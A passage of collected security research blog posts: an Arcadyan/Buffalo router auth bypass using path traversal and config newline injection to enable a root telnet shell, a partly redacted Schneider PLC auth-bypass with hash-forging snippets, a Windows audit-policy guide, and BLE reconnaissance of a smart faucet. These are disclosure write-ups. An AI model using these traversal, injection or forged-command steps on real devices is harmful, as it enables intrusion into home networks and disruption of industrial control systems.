Glancing at the bypass list we see login.html, loginerror.html and some other paths/pages, which makes sense as even unauthenticated users will need to be able to access those urls.

You may have already noticed the bug here. bypass_check() is only checking as many bytes as are in the bypass_list strings. This means that if a user is trying to reach http://router/images/someimage.png, the comparison will match since /images/ is in the bypass list, and the url we are trying to reach begins with /images/. The bypass_check() function doesn’t care about strings which come after, such as “someimage.png”. So what if we try to reach /images/../<somepagehere>? For example, let’s try /images/..%2finfo.html. The /info.html url normally contains all of the nice LAN/WAN info when we first login to the device, but returns any unauthenticated users to the login screen. With our special url, we might be able to bypass the authentication requirement.

After a bit of match/replace to account for relative paths, we still see an underwhelming display. We have successfully bypassed authentication using the path traversal (🙂 ) but we’re still missing something (🙁 ).

404s for requests to made to js files

Looking at the Burp traffic, we can see a number of requests to /cgi/<various_nifty_cgi>.js are returning a 404, which normally return all of the info we’re looking for. We also see that there are a couple of parameters passed when making requests to those files.

One of those parameters (_t) is just a datetime stamp. The other is an httoken, which acts like a CSRF token, and figuring out where / how those are generated will be discussed in the next section. For now, let’s focus on why these particular requests are failing.

Looking at httpd in Ghidra shows that there is a fair amount of debugging output printed when errors occur. Stopping the default httpd process, and running it from our shell shows that we can easily see this output which may help us identify the issue with the current request.

requests failing due to improper Referrer header

Without diving into url_token_pass, we can see that it is saying that httoken is invalid from http://192.168.11.1/images/..%2finfo.html. We will dive into httokens next, but the token we have here is correct, which means that the part causing the failure is the “from” url, which corresponds to the Referer header in the request. So, if we create a quick match/replace rule in Burp Suite to fix the Referer header to remove the /images/..%2f then we can see the info table, confirming our ability to bypass authentication.

our content loaded :)

A quick summary of where we are so far:

  • We can bypass authentication and access pages which should be restricted to authenticated users.
  • Those pages include access to httokens which let us make GET/POST requests for more sensitive info and grant the ability to make configuration changes.
  • We know we also need to set the Referer header appropriately in order for httokens to be accepted.

The adventure of getting proper httokens

While we know that the httokens are grabbed at some point on the pages we access, we don’t know where they’re coming from or how they’re generated. This will be important to understand if we want to carry this exploitation further, since they are required to do or access anything sensitive on the device. Tracking down how the web interface produces these tokens felt like something out of a Capture-the-Flag event.

The info.html page we accessed with the path traversal was populating its information table with data from .js files under the /cgi/ directory, and was passing two parameters. One, a date time stamp (_t), and the other, the httoken we’re trying to figure out.

We can see that the links used to grab the info from /cgi/ are generated using the URLToken() function, which sets the httoken (the parameter _tn in this case) using the function get_token(), but get_token() doesn’t seem to be defined anywhere in any of the scripts used on the page.

Looking right above where URLToken() is defined we see this strange string defined.

Looking into where it is used, we find the following snippet.

Which, when run adds the following script to the page:

We’ve found our missing getToken() function, but it looks to be doing something equally strange as the snippets that got us here. It is grabbing another encoded string from an image tag which appears to exist on every page (with differing encoded strings). What is going on here?

getToken() is getting data from this spacer img tag

The httokens are being grabbed from these spacer img src strings and are used to make requests to sensitive resources.

We can find a function where the httoken is being inserted into the img tag in Ghidra.

Without going into all of the details around the setting/getting of httoken and how it is checked for GET and POST requests, we will say that:

  • httokens, which are required to make GET and POST requests to various parts of the web interface, are generated server-side.
  • They are stored encoded in the img tags at the bottom of any given page when it loads
  • They are then decoded in client-side javascript.

We can use the tokens for any requests we need as long as the token and the Referer being used in the request match. We can make requests to sensitive pages using the token grabbed from login.html, but we still need the authentication bypass to access some actions (like making configuration changes).

Notably, on the WSR-2533DHPL2 just using this knowledge of the tokens means we can access the administrator password for the device, a vulnerability which appears to already be fixed on the WSR-2533DHP3 (despite both having firmware releases around the same time).

Now that we know we can effectively perform any action on the device without being authenticated, let’s see what we can do with that.

Injecting configuration options and enabling telnetd

One of the first places I check for any web interface / application which has utilities like a ping function is to see how those utilities are implemented, because even just a quick Google turns up a number of historic examples of router ping utilities being prone to command injection vulnerabilities.

While there wasn’t an easily achievable command injection in the ping command, looking at how it is implemented led to another vulnerability. When the ping command is run from the web interface, it takes an input of the host to ping.

After the request is made successfully, ARC_ping_ipaddress is stored in the global configuration file. Noting this, the first thing I tried was to inject a newline/carriage return character (%0A when url-encoded), followed by some text to see if we could inject configuration settings. Sure enough, when checking the configuration file, the text entered after %0A appears on a new line in the configuration file.

With this in mind, we can take a look at any interesting configuration settings we see, and hope that we’re able to overwrite them by injecting the ARC_ping_ipaddress parameter. There are a number of options seen in the configuration file, but one which caught my attention was ARC_SYS_TelnetdEnable=0. Enabling telnetd seemed like a good candidate for gaining a remote shell on the device.

It was unclear whether simply injecting the configuration file with ARC_SYS_TelnetdEnable=1 would work, as it would then be followed by a conflicting setting later in the file (as ARC_SYS_TelnetdEnable=0 appears lower in the configuration file than ARC_ping_ipdaddress). However, after sending the following request in Burp Suite, and sending a reboot request (which is necessary for certain configuration changes to take effect).

Once the reboot completes we can connect to the device on port 23 where telnetd is listening, and are greeted with a root BusyBox shell, just like we have via UART.

Altogether now

Here are the pieces we need to put together in a python script if we want to make exploiting this super easy:

  • Get proper httokens from the img tags on a page.
  • Use those httokens in combination with the path traversal to make a valid request to apply_abstract.cgi
  • In that valid request to apply_abstract.cgi, inject the ARC_SYS_TelnetdEnable=1 configuration option
  • Send another valid request to reboot the device
Running a quick PoC against the WSR-2533DHPL2

Surprise: More affected devices

Shortly before the 90 day disclosure date for the vulnerabilities discussed in this blog, I was trying to determine the number of potentially affected devices visible online via Shodan and BinaryEdge. In my searches, I noticed that a number of devices which presented similar web interfaces to those seen on the Buffalo devices. Too similar, in fact, as they appeared to use almost all the same strange methods for hiding the httokens in img tags, and javascript functions obfuscated in “enkripsi” strings.

The common denominator is that all of the devices were manufactured by Arcadyan. In hindsight, it should have been obvious to look for more affected devices outside of Buffalo’s product line given how much of the Buffalo firmware appeared to have been built by Arcadyan. However, after obtaining and testing a number of Arcadyan-manufactured devices it also became clear that not all of them were created equally, and the devices weren’t always affected in exactly the same way.

That said, all of the devices we were able to test or have tested via third-parties shared at least one vulnerability: The path traversal which allows an attacker to bypass authentication, now assigned as CVE-2021–20090. This appears to be shared by almost every Arcadyan-manufactured router/modem we could find, including devices which were originally sold as far back as 2008.

On April 21st, 2021, Tenable reported CVE-2021–20090 to four additional vendors (Hughesnet, O2, Verizon, Vodafone), and reported the issues to Arcadyan on April 22nd. As time went on it became clear that many more vendors were affected and contacting and tracking them all would become very difficult, and so on May 18th, Tenable reported the issues to the CERT Coordination Center for help with that process. A list of the affected devices can be found in either Tenable’s own advisory, and more information can be found on CERT’s page tracking the issue.

There is a much larger conversation to be had about how this vulnerability in Arcadyan’s firmware has existed for at least 10 years and has therefore found its way through the supply chain into at least 20 models across 17 different vendors, and that is touched on in a whitepaper Tenable has released.

Takeaways

The Buffalo WSR-2533DHPL2 was the first router I’d ever purchased for the purpose of discovering vulnerabilities, and it was a super fun experience. The strange obfuscations and simplicity of the bugs made it feel like my own personal CTF. While I got a little more than I bargained for upon learning how widespread one of the vulnerabilities (CVE-2021–20090) was, it was an important lesson in how one should approach research on consumer electronics: The vendor selling you the device is not necessarily the one who manufactured it, and if you find bugs in a consumer router’s firmware, they could potentially affect many more vendors and devices than just the one you are researching.

I’d also like to encourage security researchers who are able to get their hands on one of the 20+ affected devices to take a look for (and report) any post-authentication vulnerabilities like the configuration injection found in the Buffalo routers. I suspect there are a lot more issues to be found in this set of devices, but each device is slightly different and difficult to obtain for researchers not living in the country where they are sold/provided by a local ISP.

Thanks for reading, and happy hacking!


Bypassing Authentication on Arcadyan Routers with CVE-2021–20090 and rooting some Buffalo was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580)

13 July 2021 at 14:31

What you see in the picture above is similar to what you might see at a factory, plant, or inside a machine. At the core of it is Schneider Electric’s Modicon M340 programmable logic controller (PLC). It’s the module at the top right with the ethernet cable plugged in (see picture below), the brains of the operation.

Power supply, PLC, and IO modules attached to backplane.

PLCs are devices that coordinate, monitor, and control industrial processes or machines. They interface with modules (often interconnected through a shared backplane) that allow them to gather data from sensors such as thermostats, pressure, proximity, etc.., and send control signals to equipment such as motors, pumps, and heaters. They are typically hardened in order to survive in rough environments.

PLCs are typically connected to a Supervisory Control and Data Acquisition (SCADA) system or Human Machine Interface (HMI), the user interface for control systems. SCADA controllers can monitor and control multiple subordinate PLCs from one location, and like PLCs, are also monitored and controlled by humans through a connected HMI.

In our test system, we have a Schneider Electric Modicon M340 PLC. It is able to switch on and off outlets via solid state relays and is connected to my network via an ethernet cable, and the engineering station software on my computer is running an HMI which allows me to turn the outlets on and off. Here is the simple HMI I designed for switching the outlets:

Simple Human Machine Interface (HMI)

The connected light is currently on (the yellow circle). Hitting the off button will turn off the actual light and turn the circle on the interface gray.

The engineering station contains programming software (Schneider Electric Control Expert) that allows one to program both the PLC and HMI interfaces.

A PLC is very similar to a virtual machine in its operation; they typically run an underlying operating system or “firmware,” and the control program or “runtime” is started, stopped, and monitored by the underlying operating system.

Ecostruxure Control Expert — Engineering Station Software

These systems often operate in “air-gapped” environments (not connected to the internet) for security purposes, but this is not always the case. Additionally, it is possible for malware (e.g. stuxnet) to make it into the environments when engineers or technicians plug outside equipment into the network, such as laptops for maintenance.

Cyber security in industrial control systems has been severely lacking for decades, mostly due to the false sense of security given by “air-gaps” or segmented networks. Often controllers are not protected by any sort of security at all. Some vendors claim that it is the responsibility of an intermediary system to enforce.

As a result of this somewhat lax standpoint towards security in industrial automation, there have been a few attacks recently that made the news:

Vendors are finally starting to wake up to this, and newer PLCs and software revisions are starting to implement more hardened security all the way down to the controller level. In this blog, I will examine the recent cyber security enhancements inside Schneider Electric’s Modicon M340 PLC.

Internet Connected Devices

The team did a cursory search on BinaryEdge to determine if any of these devices (including the M580, which we later learned was also affected) are connected to the internet. To our surprise, we found quite a few that appear legitimate across several industries including:

  • Water Treatment
  • Oil (production)
  • Gas
  • Solar
  • Hydro
  • Drainage / Levees
  • Dairy
  • Car Washes
  • Cosmetics
  • Fertilizer
  • Parking
  • Plastic Manufacturing
  • Air Filtration

Here is a breakdown of the top 10 affected countries at the time of this writing:

We have alerted ICS-CERT of the presence of these devices prior to disclosure in order to hopefully mitigate any possible attacks.

PLC Engineering Station Connection

The engineering station talks to the PLC primarily via two protocols, FTP, and Modbus. FTP is primarily used to upgrade the firmware on the device. Modbus is used to upload the runtime code to the controller, start/stop the controller runtime, and allow for remote monitoring and control via an HMI.

Modbus can be utilized over various transport layers such as ethernet or serial. In this blog, we will focus on Modbus over TCP/IP.

Modbus is a very simple protocol designed by Schneider Electric for communicating with multiple controllers for the purposes of monitoring and control. Here is the Modbus TCP/IP packet structure:

Modbus packet structure (from Wikipedia)

There are several predefined function codes in modbus, like read/write coils (e.g. for operating relays attached to a PLC) or read/write registers (e.g. to read sensor data). For our controller (and many others), Schneider Electric has a custom function code called Unified Messaging Application Services or UMAS. This function code is 0x5a, or 90. The data bytes contain the underlying UMAS packet data. So in essence, UMAS is tunneled through Modbus.

After the 0x5a there are two bytes, the second of which is the UMAS packet type. In the image above, it is 0x02, which is a READ_ID request. You can find out more information about the UMAS protocol, and a break down of the various message types in this great writeup: http://lirasenlared.blogspot.com/2017/08/the-unity-umas-protocol-part-i.html.

M340 Cyber Security

The recent cyber security enhancements in the M340 firmware (from version 3.01 on 2/2019 and onward) are designed to prevent a remote attacker from executing certain functions on the controller, such as starting and stopping the runtime, reading and writing variables or system bits (to control the program execution), or even uploading a new project to the controller if an application password is configured under the “Project & Controller Protection” tab in the project properties. Due to it being improperly implemented, it is possible to start and stop the controller without this password, as well as perform other control functions protected by the cyber security feature.

Auth Bypass

When connecting to a PLC, the client sends a request to read memory block <redacted> on the PLC before any authentication is performed. This block appears to contain information about the project (such as the project name, version, and file path to the project on the engineering station) and authentication information as well.

<redacted> memory block, containing authentication hashes

Here, “TenableFactory” is the project name. “AGC7MAIWE” is the “Crypted” program and safety project password. The base64 string is used afterwards to verify the application password. This is done as follows:

The actual password is only checked on the client side. To negotiate an authenticated session, or “reservation” first you need to generate a 32 byte random nonce (which is a term for a random number generated once each session), send it to the server, and get one back. This is done through a new type of UMAS packet introduced with the cyber security upgrades, which is <redacted>. I’ve highlighted the nonces (client followed by server) exchanged below:

The next step is to make a reservation using packet type <redacted>. With the new cyber security enhancements, in addition to the computer name of the connecting host, an ASCII sha256 hash is also appended:

This hash is generated as follows:

SHA256 (server_nonce + base64_str + client_nonce)

The base64 string is from the first block <redacted> read and in this case would be:

“pMESWEjNgAY=\r\nf6A17wsxm7F5syxa75GsQhNVC4bDw1qrEhnAp08RqsM=\r\n”. 

You do not need to know the actual password to generate this SHA256.

The response contains a byte at the end (here it is 0xc9) that needs to be included after the 0x5a in protected requests (such as starting and stopping the PLC runtime).

To generate a request to a protected function (such as start PLC runtime) you first start with the base request:

# start PLC request
to_send = “\x5a” + check_byte + “\x40\xff\x00”

check_byte in this case would be 0xc9 from the reservation request response. You then calculate two hashes:

auth_hash_pre = sha256(hardware_id + client_nonce).digest()
auth_hash_post = sha256(hardware_id + server_nonce).digest()

hardware_id can be obtained by issuing an info request (0x02):

Here the hardware_id is 06 01 03 01.

Once you have the hashes above, you calculate the “auth” hash as follows:

auth_hash = (sha256(auth_hash_pre + to_send + auth_hash_post).digest())

The complete packet (without modbus header) is built as follows:

start_plc_pkt = (“\x5a” + check_byte + “\x38\01” + auth_hash + to_send)

Put everything together in a PoC and you can do things like start and stop controllers remotely:

Proof of Concept in action

A complete PoC (auth_bypass_poc.py) can be found here:

<redacted>

Here is a demo video of the exploit in action, against a model water treatment plant:

Ideally, the controller itself should verify the password. Using a temporal key-exchange algorithm such as Diffie-Hellman to negotiate a pre-shared key, the password could be encrypted using a cipher such as AES and securely shared with the controller for evaluation. Better yet, certificate authentication could be implemented which would allow access to be easily revoked from one central location.

Program and Safety Password

If the Crypted box is checked, a weak, unknown, non-cryptographically sound custom algorithm is used, which reveals the length of the password (the length of hash = length of password).

Program and Safety Protection Password Crypted Option

If the “Crypt” box isn’t checked, this password is in plaintext which is a password disclosure issue.

Here is a reverse engineered implementation I wrote in python:

This appears to be a custom hashing function, as I couldn’t find anything similar to it during my research. There are a couple of issues I’ve noticed. First, the length of the hash matches the length of the password, revealing the password length. Secondly, the hash itself is limited in characters (A-Z and 0–9) which is likely to lead to hash collisions. It is easily possible to find two plaintext messages that hash to the same value, especially with smaller passwords. For example, ‘acq’, ‘asq’, ‘isy’ and ‘qsq’ all hash to ‘5DF’.

Firmware Web Server Errata

Here are a few things I noticed while examining the controller firmware, specifically having to do with the built-in PLC web server they call FactoryCase. This is not enabled by default.

Predictable Web Nonce

The web nonce is calculated by concatenating a few time stamps to a hard coded string. Therefore, it would be possible to predict what values the nonce might be within a certain time frame.

The proper way to calculate a nonce would be to use a proper cryptographic random number generator.

Rot13 Storage of Web Password Data

It appears that the plaintext web username and password is stored somewhere locally on the controller using rot13. Ideally, these should be stored using a salted hash. If the controller was stolen, it might be possible for an attacker to recover this password.

Conclusion

What at the surface looks like authentication, especially when viewing a packet capture, actually isn’t when you dig into the details. Some critical errors were made and not caught during the design and testing of the authentication mechanisms. More oversight and auditing is needed for the security mechanisms in critical products such as this. It’s as critical as the water proofing, heat shielding, and vibration hardening in the hardware. These enhancements should not have made it past critical design review.

This goes back to a core tenet of security that you can’t trust a client. You have to verify every interaction server side. You can not rely on client side software (a.k.a “Engineering Station”) to do the security checks. This verification needs to be done at every level, all the way down to the PLCs.

Another tenet violated would be to not roll your own crypto. There are tons of standard cryptographic algorithms implemented in well tested and designed libraries, and published authentication standards that are easy enough to borrow. You will make a mistake trying to implement it yourself.

We disclosed the vulnerability to Schneider Electric in May 2021. As per https://www.zdnet.com/article/modipwn-critical-vulnerability-discovered-in-schneider-electric-modicon-plcs/, the vulnerability was first reported to Schneider in Fall 2020. In the interest of keeping sensitive systems “safer”, we have had to redact multiple opcodes and PoC code from the blog as this is one of those rarest of rare cases where full disclosure couldn’t be followed. After many animated internal discussions, we had to take this step even though we are proponents of full disclosure. Schneider hasn’t provided an ETA yet on when this issue would be fixed, saying that it is still many months out. We were also informed that five other researchers have co-discovered and reported this issue.

While vendors are expected to patch within 90 days of disclosure, the ICS industry as a whole hasn’t evolved to the extent it should have in terms of security maturity to meet these expectations. Given the sensitive industries where the PLCs are deployed, one would imagine that we would have come a long way by now in terms of elevating the security posture. Prioritizing and funding a holistic Security Development Lifecycle (SDL) is key to reducing cyber exposure and raising the bar for attackers.. However, many of these systems are just sitting there unguarded and in some cases, without anyone aware of the potential danger.

See https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-01 for Schneider Electrics advisory.

See https://us-cert.cisa.gov/ics/advisories/icsa-21-194-02 for ICS-CERTs advisory.


Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit…

6 July 2021 at 21:54

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit policy

Tenable.ad can detect Active Directory attacks. To do this, the solution needs to collect security events from the monitored Domain Controllers to be analyzed and correlated. Fortunately, Windows offers built-in audit policy settings to configure which events should be logged. But when testing those options, we noticed surprising behaviors that can lead to missed events.

When you configure your Active Directory domain controllers to log security events to send to your SIEM and raise alerts, you absolutely do not want any regression which would ultimately blind your SOC! In this article we will share technical tips to prevent those unexpected issues.

Disclaimer

This content is based on observations and our interpretation of Microsoft documentation. This article is provided “as-is” and we do not provide any guarantee of correctness nor exhaustiveness and you should only rely on Microsoft guidance.

Introduction

Starting with Windows 2000, Windows offered only simple audit policy settings grouped in nine categories. Those are referred to as “top-level categories” or “basic audit policy” and they are still available in modern versions.

Later, “granular auditing” was introduced with Windows Vista / 2008 (it was configurable only via “auditpol.exe”) and then Windows 7 / 2008 R2 (configurable via GPO). Those are referred to as “sub-level categories” or “advanced audit policy”.

Each basic setting corresponds to a mix of several advanced settings. For example, from Microsoft Advanced security auditing FAQ:

Enabling the single basic account logon setting would be the equivalent of setting all four advanced account logon settings.

The content described in this article was tested on Windows Active Directory domain controllers because those are the most appropriate sources of interest for Active Directory attacks detection, but it should apply to all kinds of Windows machines (servers & workstations).

Surprise #1 — Advanced audit policy fully replaces the basic policy

As soon as we enable even just one advanced audit policy setting, Windows fully switches to advanced policy mode and ignores all existing basic policies (at least on the recent versions of Windows we tested)! Here is a demonstration:

  • Before: the system uses basic settings. We enable “Success, Failure” for “Audit privilege use” (green highlighting) and for other categories the default values apply. This works as expected:
  • After: we only enable one advanced setting (green highlighting). Notice how everything else is not audited anymore, including what we explicitly configured in the basic policy (red highlighting)!

Therefore, you cannot have both and thus when you start using the advanced audit policy, which you should, you are committed to it and should abandon the basic settings to prevent confusion.

Microsoft Advanced security auditing FAQ explains it:

When advanced audit policy settings are applied by using Group Policy, the current computer’s audit policy settings are cleared before the resulting advanced audit policy settings are applied. After you apply advanced audit policy settings by using Group Policy, you can only reliably set system audit policy for the computer by using the advanced audit policy settings. […] Important: Whether you apply advanced audit policies by using Group Policy or by using logon scripts, do not use both the basic audit policy settings under Local Policies\Audit Policy and the advanced settings under Security Settings\Advanced Audit Policy Configuration. Using both advanced and basic audit policy settings can cause unexpected results in audit reporting.

➡️ Tenable.ad recommendation: use advanced audit policy settings only. Existing basic audit policies should be converted.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #2 — Advanced audit policy may be ignored

However, there are some cases where basic audit policy settings may still take priority over the ones defined in the advanced audit policy. Correctly understanding when and where it could happen is complicated.

As per Microsoft Advanced security auditing FAQ:

If you use Advanced Audit Policy Configuration settings or use logon scripts to apply advanced audit policies, be sure to enable the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” policy setting under “Local Policies\Security Options”. This will prevent conflicts between similar settings by forcing basic security auditing to be ignored.

➡️ Tenable.ad recommendation: once you start using advanced audit policy, we recommend enabling the “Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings” GPO setting to prevent undesired surprises. Its default value being “Enabled”, it should already be effective anyway in the majority of environments.
This recommendation is present in the best practices and hardening guides published by cybersecurity organizations (such as ANSSI, DISA STIG, CIS Benchmarks…).

Surprise #3 — Advanced audit policy default values are not respected

As we saw previously, as soon as we enable even just one advanced audit policy setting the system entirely switches to the advanced mode. The question we may have now is how does the system manage the other settings that we did not specify? There are certainly sensible default values, aren’t there? These default values are described in the documentation of each audit policy setting. Let’s read the explanation of the “Audit Logon” setting:

So, here on a server I should expect a default value of “Success, Failure” for the “Audit Logon” setting if not configured, shouldn’t I? Well, we may have a surprise here.

Here is the configuration I applied on my server: I enabled “Success” logging for “Audit Account Lockout” and left “Audit Logon” as “Not Configured”:

However, when looking at the resulting audit policy I notice that “Logon” events are not audited, contrary to their default:

We knew we should not rely on defaults… but this one is really surprising. Of course we made sure that there was no other GPO defining any audit policy setting.

➡️ Tenable.ad recommendation: do not rely on default values for Advanced audit policy settings: explicitly configure the desired value (No Auditing, Success, Failure, or Success and Failure) for each setting of interest.

Be even more careful when migrating from a basic audit policy: make sure to export the resulting policy you had on a normal machine, and convert it to all the appropriate advanced settings to prevent any regression in logging. And as usual with GPOs, especially for security settings, aim to create a single security GPO linked the highest possible, instead of spreading those in many lower-level GPOs.

Surprise #4 — Settings defined by GPOs are not merged

What happens when a machine is covered by several GPOs which define audit policy settings? What if one GPO enables “Success” auditing while another enables “Failure” auditing, is there a merge and would we obtain “Success and Failure”?

Answer: there is no merge at the setting level, and only the value of the GPO with the highest priority is applied. This is actually coherent with the way the Group Policy engine usually works, so not really a surprise, but still to keep in mind.

Here is a demonstration where we want to configure auditing on domain controllers. Two GPOs apply to those servers:

Default Domain Policy” linked at the top of the Active Directory domain

  • Audit Account Lockout” is set to “Success and Failure” (yellow highlighting)
  • Audit Logon” is set to “Success” (red highlighting)

Default Domain Controllers Policy” linked to the “Domain Controllers” organization unit

  • Audit Logoff” is set to “Success and Failure” (blue highlighting)
  • Audit Logon” is set to “Failure” (red highlighting)

Now let’s see the resulting audit policy:

We notice that the conflicting values for “Logon” (red highlighting) were not merged, instead it is the value of the “Default Domain Controllers Policy”. This GPO won as per the usual GPO precedence rules.

We also observe that the values for “Logoff” (blue highlighting) from the “Default Domain Controllers Policy” and “Account Lockout” (yellow highlighting) from the “Default Domain Policy” are both properly applied because those were not in conflict.

Here is how Microsoft Advanced security auditing FAQ explains it:

By default, policy options that are set in GPOs and linked to higher levels of Active Directory sites, domains, and OUs are inherited by all OUs at lower levels. However, an inherited policy can be overridden by a GPO that is linked at a lower level.

You can also read more about GPO Processing Order in the [MS-GPOL] specification.

➡️ Tenable.ad recommendation: keep in mind that conflicting audit settings are not merged.
If you want to define a domain-wide security auditing GPO, you should ensure that no other GPO at a lower OU level overrides its settings. If necessary, you can set this domain-wide GPO as “Enforced”, even if this is not our preferred option as it can become confusing when managing a large set of GPOs.

If you are only concerned about auditing on domain controllers, you can link a GPO to the “Domain Controllers” organizational unit, as long as there is no domain-level “Enforced” GPO overriding audit policy settings.

Surprise #5 — Only one tool properly shows the effective audit policy

We have just shown that we can have many surprises when configuring auditing, so we really would like a way to see the effective audit policy on a system to confirm that it is as expected.

We could be tempted to use tools which compute the result of GPOs (RSoP), but…

For example, “rsop.msc” does not even seem to support advanced audit policy, which is not too surprising since it is deprecated! See how this section is used in the GPO editor on the right-hand side whereas it is missing in “rsop.msc” on the left-hand side:

And with “gpresult.exe”, if we have basic and advanced audit policies, we will see both: which one applies?

And what about settings that might have been configured locally and not through a GPO (which is not advised…)?

The only supported tool which can properly read the current effective audit policy is “auditpol.exe”, as you may have guessed from our previous screenshots. This is confirmed by a Microsoft blog post. For those who want to dig deeper: “auditpol.exe” calls AuditQuerySystemPolicywhich finally calls the “LsarQueryAuditPolicy” RPC in LSASS.

➡️ Tenable.ad recommendation: only trust the following command to see the effective audit policy on machines: “auditpol.exe /get /category:*”

Surprise bonus — Confusions in the specification

Configuring advanced audit policy in a GPO creates an “audit.csv” file which is described in the [MS-GPAC] Microsoft open specification. We found a mistake in one of the examples:

Machine Name,Policy Target,Subcategory,Subcategory GUID,Inclusion Setting,Exclusion Setting,Setting Value
TEST-MACHINE,System,IPsec Driver,{0CCE9213–69AE-11D9-BED3–505054503030},No Auditing,,0
TEST-MACHINE,System,System Integrity,{0CCE9212–69AE-11D9-BED3–505054503030},Success,,1
TEST-MACHINE,System,IPsec Extended Mode,{0CCE921A-69AE-11D9-BED3–505054503030},Success and Failure,,3
TEST-MACHINE,System,File System,{0CCE921D-69AE-11D9-BED3–505054503030},Not specified,,0

On the right-hand columns we have the setting name (such as “No Auditing”, “Success”, etc.) and the corresponding numerical value (0, 1, 3…). We can see that according to the first and last lines the value “0” is associated with both “No Auditing” and “Not specified” which does not make sense. Fortunately the text value is ignored: “value of InclusionSetting is for user readability only and is ignored when the advanced audit policy is applied”.

Also, we found the specification a bit confusing regarding the values of “0” and “4”:

A value of “0”: Indicates that this audit subcategory setting is unchanged.
A value of “4”: Indicates that this audit subcategory setting is set to None.

Our observations actually show that:

  • A value of “0” means that auditing is “disabled”, which corresponds to this in the graphical editor:
  • A value of “4” means that auditing is “not specified”, and thus the default value should apply (except when it does not, as shown before), which would correspond to this in the graphical editor (except that in this case the editor does not even generate a line for this setting in “audit.csv”):

Don’t make your SOC blind to Active Directory attacks: 5 surprising behaviors of Windows audit… was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Plumbing the Depths of Sloan’s Smart Bathroom Fixture Vulnerabilities

By: Ben Smith
30 June 2021 at 13:03

As I stood in line at my local donut shop, I idly began scanning nearby Bluetooth Low Energy (BLE) devices. There were several high-rises nearby, and who knows what interesting things lurk in those halls. Typically, I’ll see consumer technology like Apple products, fitness trackers, entertainment systems, but that day I saw something that piqued my interest… Device Name: FAUCET ADSKU01 A0174. A bluetooth… faucet?! I had to know more. Since I clearly did not own this particular device and also didn’t want to risk a flood, I went home and looked up all I could find about these SmartFaucets while greedily gobbling a glazed donut or two.

Device Name: FAUCET

The device ran in a line of SmartFaucets and Flushometers made by Sloan Valve Company. I had to find one I could use for testing. Their connected devices are Sloan SmartFaucets including Optima EAF, Optima ETF/EBF, BASYS EFX (these require an external adapter) and Flushometers such as SOLIS and can be viewed over at https://www.sloan.com/design/connected-products. The app to connect to these devices is called SmartConnect and is available in the Google Play or Apple App stores.

An update to Sloan’s feature checklist

A Quick Bluetooth Glossary

Bluetooth Classic — This is the original Bluetooth protocol still widely used. Sometimes it will be referred to as “BR” or “EDR.” Devices are connected one to one.

Bluetooth Low Energy (BLE) — This is actually a different protocol from Bluetooth Classic. It has lower energy requirements, and devices can interoperate one-to-one, one-to-many, or even many-to-many. Almost everywhere we mention Bluetooth in this article, we mean BLE, and not Bluetooth Classic.

Services — Technically part of the “GATT” BLE layer, services are groupings of characteristics by function.

Characteristics — Part of the “GATT” BLE layer, characteristics are UUID/value pairs on a device. The value can be read, written to, and more, depending on permissions. Sometimes it’s helpful to think of them as UDP ports with (generally) very simple services.

UUIDs — Random numbers used to refer to services and characteristics. Some are assigned by the Bluetooth SIG, while others are set by the device’s manufacturer.

Sloan SmartConnect App

SmartConnect App has a button to “Dispense Water”

As its sole protection mechanism, the app requires a phone number prior to use and then sends a code to that number.

More SmartConnect app functionality

After that, quite an array of features are available. Let’s see what we can find out with an actual device.

SmartFaucet

Sloan EBF615–4 Internals

I managed to acquire a Sloan EBF615–4 Optima Plus, added batteries, and plugged in the faucet. When I wave my hand in front of the IR sensor, I can hear the clicking of the faucet mechanism allowing a potential flow of water to course through the spigot. This is good as I’ll have some way of knowing if we’re getting somewhere. I’d already installed the SloanConnect app, and registered with an actual phone number, so I was able to connect to the device.

Let’s start by using hcitool to scan for BLE devices nearby. Hcitool is a Linux utility for scanning for Bluetooth devices and interacting with our Bluetooth adapter. The ‘lescan’ option allows us to scan for Bluetooth Low Energy. The device we’re interested in is aptly named “FAUCET”.

pi@rpi4:~ $ sudo hcitool lescan | grep FAUCET
08:6B:D7:20:00:01 FAUCET ADSKU02 A0121
08:6B:D7:20:00:01 FAUCET ADSKU02 A0121

Now that we know its MAC address, we can use gatttool, a Linux utility for interacting with BLE devices, to query the BLE services:

pi@rpi4:~ $ sudo gatttool -b 08:6B:D7:20:00:01 — primary
attr handle = 0x0001, end grp handle = 0x0005 uuid: 00001800–0000–1000–8000–00805f9b34fb
attr handle = 0x0006, end grp handle = 0x0009 uuid: 00001801–0000–1000–8000–00805f9b34fb
attr handle = 0x000a, end grp handle = 0x000e uuid: 0000180a-0000–1000–8000–00805f9b34fb
attr handle = 0x000f, end grp handle = 0x002d uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c900
attr handle = 0x002e, end grp handle = 0x0031 uuid: 0000180f-0000–1000–8000–00805f9b34fb
attr handle = 0x0032, end grp handle = 0x0050 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c910
attr handle = 0x0051, end grp handle = 0x0081 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c920
attr handle = 0x0082, end grp handle = 0x009d uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c940
attr handle = 0x009e, end grp handle = 0x00a1 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c950
attr handle = 0x00a2, end grp handle = 0x00ba uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c960
attr handle = 0x00bb, end grp handle = 0x00d9 uuid: d0aba888-fb10–4dc9–9b17-bdd8f490c970
attr handle = 0x00da, end grp handle = 0xffff uuid: 1d14d6ee-fd63–4fa1-bfa4–8f47b42119f0

and their characteristics:

pi@rpi4:~ $ sudo gatttool -b 08:6B:D7:20:00:01 — characteristics
handle = 0x0002, char properties = 0x0a, char value handle = 0x0003, uuid = 00002a00–0000–1000–8000–00805f9b34fb
